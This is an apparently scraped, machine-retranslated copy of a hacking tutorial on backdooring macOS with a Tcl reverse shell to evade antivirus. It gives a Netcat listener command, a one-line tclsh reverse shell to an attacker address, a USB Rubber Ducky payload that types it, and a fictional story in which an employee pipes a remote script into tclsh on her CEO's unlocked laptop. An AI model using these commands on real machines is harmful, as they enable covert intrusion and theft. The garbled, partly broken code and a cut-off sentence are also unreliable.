قالب وردپرس درنا توس
Home / Tips and Tricks / How to Use a Tclsh Command to Avoid Antivirus Protection «Null Byte :: WonderHowTo

How to Use a Tclsh Command to Avoid Antivirus Protection «Null Byte :: WonderHowTo



When using Netcat for backdoor, a MacOS device has its drawbacks. When the compromised Mac goes to sleep, occasionally the Netcat background process does not shut down properly. As a result, Netcat runs infinitely in the background and the attacker has no new way into the device. As an alternative, we use the lesser-known Tcl shell, which can handle abrupt backdoor disconnections.

What is Tcl?

Tcl (which stands for "Tool Command Language") is an open-source, general-purpose dynamic programming language similar to Bourne's shell (sh), C's shell (csh), and Perl. Because this is a common language, it can be used with many things, such as networking, administrative, and desktop applications. Tcl is mature, cross-platform, easy to deploy, and extensible, depending on location.

Tclsh is a shell-like application that reads Tcl commands. Similar to Python or Bash, when Tclsh runs without arguments in a terminal, it interactively opens and waits for further commands from the user. Tcl scripts can also be created with the file extensions .tclshrc and .tcl.

Why is Tcl better than Python / Bash backdoors?

As mentioned before, Netcat backdoors can be created with minimal characters for fast remote access to a Mac desktop or laptop. However, if the MacBook or other Mac OS device suddenly hibernates, locks off, or breaks the Wi-Fi connection while the attacker is issuing remote commands, the Netcat process may freeze and stop. This ultimately gives the attacker no new way to access the device.

Fortunately, Tclsh treats sudden interruptions elegantly and already exists on all macOS devices. If you are a macOS user, you can test this by opening a terminal and typing tclsh . You will find that ls and ifconfig work as expected.

Step 1: Starting a Netcat Listener

To use Tclsh as a backdoor mechanism, open a terminal in Kali (or any Unix-based operating system with Netcat installed) and enter the following command to create a Netcat listener to start.

  nc -l -p 9999 

Netcat opens a Listening ( -l ) port on every available interface. If you are working on a local network, the Netcat Listener is available at your local address (for example, 192.168.0.X ). If the listener is started on a Virtual Private Server (VPS), make sure that you use your VPS IP address in future Tclsh commands. The port ( -p ) number ( 9999 ) is arbitrary and can be changed to any number under 65535.

Step 2: Run the Tclsh command

Finally, run the following command on each Mac OS device to establish a remote connection. Remember to change the 1.2.3.4 address to the local or VPS address of the attacker.

  echo & s; set [socket 1.2.3.4 9999] while 42 {puts -nonewline $ s "hacker>"; flush $ s; gets $ sc; set e "exec $ c"; if {! [catch {set r [eval $e]} err]} {puts $ s $ r}; Flush $ s; }; close $ s; & # 39; | tclsh & 

This command will generate a number of variables and ultimately connect Tclsh between the macOS device and the attacker's system. The established shell works as expected, much like any terminal or netcat shell you've used in the past.

Step 3: Rubber Ducky Payloads (optional)

In future articles I will dive deeper into social engineering techniques to make macOS users execute our nefarious orders. Now let's use a USB Rubber Ducky to execute the command, where a few seconds of physical access are possible. Below is a sample payload.

  DELAY 1500
GUI SPACE
DELAY 350
STRING port
DELAY 100
ENTER
DELAY 1000
STRING echo? S [socket 1.2.3.4 9999] while 42 {puts -nonewline $ s "hacker>"; flush $ s; gets $ sc; set e "exec $ c"; if {! [catch {set r [eval $e]} err]} {puts $ s $ r}; Flush $ s; }; close $ s; & # 39; | tclsh
ENTER
GUI q 

This Ducky script will open a terminal window with Spotlight and quickly enter the long Tclsh command. When you are done, the terminal will be closed.

It could happen to you

How many times does the average user leave their unlocked laptop? More than you might think. People in positions of power often make the mistake of believing that their employees respect (or fear) them too much to enter their office and personal space when they are not there.

My one-line payload continues another fictitious short story that shows how easily an employee in a business can compromise a colleague's device.

While the following story is purely fictional and hypothetical, I tested the tested payload against macOS High Sierra, where Avast antivirus software is

The CEO & the Hacker

Mitnick & Ridpath was a successful Californian law firm two contract lawyers, Susan Headley and Ramy Badir. When she was in the office one afternoon, during her lunch break, Susan heard two payroll professionals talking about lawyers and their annual income. They speculated that Susan earned a third of Ramy's average salary based on bills they had processed for the company.

The specialists kept Susan in mind for a few days until she decided to find out if the gossip was really discreet. The paper records at the company containing the bills were in filing cabinets secured by high-security locks, requiring a nine-digit PIN. Getting the PIN and accessing the cabinets when nobody was around would be extremely difficult.

Susan recalled that the bills were occasionally emailed to Mike Ridpath, the company's CEO, for approval; This meant that Susan had to access Mike's corporate email account to view the invoices sent by Ramy.

The partners, lawyers and paralegals met weekly at the firm to discuss overt cases; At the time, Susan was trying to gain access to Mike's email account. She knew he had used Avast security software with the latest MacBook Pro, which had not used standard USB ports. This meant that a USB Rubber Ducky was out of the question. It would take a few seconds right in front of Mike's computer to manually enter the Tclsh command.

There were four people in the room at this special meeting. Susan and her assistant, a paralegal, and Mike Ridpath. A conversation about legal cases has taken place as expected. The meeting was almost over when Mike received a personal phone call and walked out of the office. Susan pretended to make a phone call so as not to meet others in the office. Her assistant and the paralegal decided to take this opportunity to refill their coffee cups and talk at the window on the opposite side of the office.

The law clerk turned his back on Mike MacBook. The assistant could not see the MacBook directly, but Susan could interact with the laptop in her peripheral view. It would be very unusual for someone to use Mike's laptop, especially if he was not present, but Susan knew that there would be no other opportunity.

She casually walked to Mike's unlocked MacBook, pressed CommandSpace on the keyboard to start the Spotlight search. Then she tapped "ter" and squeezed Return as the terminal was selected. With a terminal window that was only opened with one hand, she typed the command.

  curl ptpb.pw/ovTg | tclsh - 

She quickly pressed Command-Q to close the terminal application, then casually stepped back from Mike's MacBook and still pretended to be on the phone.

Susan's assistant shot her a glance, still talking to the law clerk. It was a deafening moment of the break, while Susan and her assistant stared blankly, but her assistant looked back at the law assistant and continued her conversation. Her assistant did not seem to notice, and even if they did, they did not seem to care.

Stay tuned for more one-liner payloads …

This is just a fictional example of how someone could create a MacBook or Mac desktop computer with a single command. There are many more cases where an attacker could gain access to a Mac to unknowingly transfer a payload. In upcoming articles I will show more lesser-known programs that are built into macOS and can be abused by hackers.

Cover photo by Tranmautritam / Pixabay

Source link